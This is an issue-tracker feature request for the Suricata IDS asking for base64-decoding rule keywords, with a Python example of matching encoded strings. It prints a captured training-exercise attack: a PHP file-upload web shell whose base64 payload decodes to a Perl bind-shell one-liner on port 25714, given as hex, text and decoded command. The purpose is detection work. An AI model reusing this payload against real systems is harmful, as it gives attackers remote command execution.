Feature #380

closed

Base64 decoding

Added by Peter Manev about 13 years ago. Updated almost 9 years ago.

Status: Closed
Priority: Normal
Assignee: -
Target version: -
Effort:
Difficulty:
Label:

Description

I think it is important for Suricata to support Base64 decode/data rule keywords (a few of them).

pcap 22to35.pcap attached.
In it (packet #12 - if you open it with Wireshark)

This below is the hex data in packet #12 from 22to35.pcap

3b205048505345535349443d5b2a5d204572726f722072657472696576696e6720636f6f6b6965210a0d0a436f6e74656e742d4c656e6774683a203338350d0a0d0a2d2d6432746d53490d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227573657266696c65223b2066696c656e616d653d224f624879644269353157677230636a48514936752e706870220d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a0d0a3c3f7068702073797374656d286261736536345f6465636f64652827634756796243417454556c504943316c4943636b6344316d62334a724b436b375a586870644378705a6952774f33646f6157786c4b43526a5057356c6479424a547a6f365532396a613256304f6a704a546b56554b4578765932467355473979644377794e5463784e4378535a58567a5a5377784c4578706333526c62696b74506d466a5932567764436c374a483474506d5a6b6233426c6269676b597978334b5474545645524a5469302b5a6d5276634756754b43526a4c4849704f334e356333526c625352664948646f6157786c504435394a773d3d2729293f3e0d0a2d2d6432746d53492d2d

This below is the same data into text (ASCII)

; PHPSESSID=[*] Error retrieving cookie! ##here at the end most likely there is missing colon, maybe...

Content-Length: 385

--d2tmSI
Content-Disposition: form-data; name="userfile"; filename="ObHydBi51Wgr0cjHQI6u.php" 
Content-Type: text/plain

<?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwO3doaWxlKCRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyNTcxNCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdCl7JH4tPmZkb3BlbigkYyx3KTtTVERJTi0+ZmRvcGVuKCRjLHIpO3N5c3RlbSRfIHdoaWxlPD59Jw=='))?>
--d2tmSI--

This below is the decoded (from base 64) to ASCII data in the "php system(base64_decode..." function

perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,25714,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'

or the attack itself, since this is a pcap from the cyber games/trainings.

We could effectively still search for the data using rules, but we have to convert text to base64 and use it as "content" and it gets tricky.

It would be much easier if we have base64 decode keyword, since there are a lot of on-line apps that use base64.

packet #7 is the same thing.


Files

22to35.pcap (2.25 KB), Peter Manev, 11/16/2011 03:51 AM
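
Why content matching on the encoded text gets tricky, as an added example (not part of the original report and not Suricata code): a plaintext string turns into one of three different base64 substrings depending on its byte offset modulo 3, so a signature without a decode step needs all three patterns. The function names and the truncated sample input are assumptions constructed for this illustration.

```python
import base64

def b64_patterns(needle: bytes) -> list[str]:
    """Return the three base64 substrings a plaintext needle can turn into,
    one per alignment k = (byte offset of the needle in the stream) % 3."""
    if len(needle) < 2:
        raise ValueError("needle too short to leave a stable pattern")
    patterns = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + needle).decode().rstrip("=")
        head = (0, 2, 3)[k]                       # chars mixed with preceding bytes
        tail = 1 if (k + len(needle)) % 3 else 0  # char mixed with following bytes
        patterns.append(enc[head:len(enc) - tail])
    return patterns

def find_in_b64(stream: str, needle: bytes) -> int:
    """Byte offset of needle in the decoded stream, or -1. Searches the encoded
    text (standard padded base64) and decodes only the candidate window."""
    for k, pat in enumerate(b64_patterns(needle)):
        head = (0, 2, 3)[k]
        pos = stream.find(pat)
        while pos != -1:
            if pos % 4 == head:  # pattern must sit on the matching char boundary
                group = (pos - head) // 4
                end = 4 * (group + (k + len(needle) + 2) // 3)
                window = base64.b64decode(stream[4 * group:end])
                if window[k:k + len(needle)] == needle:  # confirm boundary bits
                    return 3 * group + k
            pos = stream.find(pat, pos + 1)
    return -1

# Constructed sample: the opening of the decoded command shown in the report,
# re-encoded here; truncated, so it is not the full captured payload.
PLAINTEXT = b"perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET("
STREAM = base64.b64encode(PLAINTEXT).decode()

if __name__ == "__main__":
    for needle in (b"perl", b"fork()", b"IO::Socket::INET"):
        print(needle, b64_patterns(needle), find_in_b64(STREAM, needle))
    # A single fixed encoding of the needle is not enough for a content match:
    print(base64.b64encode(b"IO::Socket::INET").decode() in STREAM)
```
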
#1

Updated by Victor Julien over 12 years ago

  • Description updated (diff)
  • Assignee set to OISF Dev
  • Target version set to TBD
#2

Updated by Victor Julien almost 12 years ago

The smtp mime decoding work here https://github.com/inliniac/suricata/pull/224 includes a base64 decoder. Maybe we can use that once it's merged.

#3

Updated by Victor Julien about 9 years ago

This should now be addressed through #1282

#4

Updated by Victor Julien almost 9 years ago

  • Status changed from New to Closed
  • Assignee deleted (OISF Dev)
  • Target version deleted (TBD)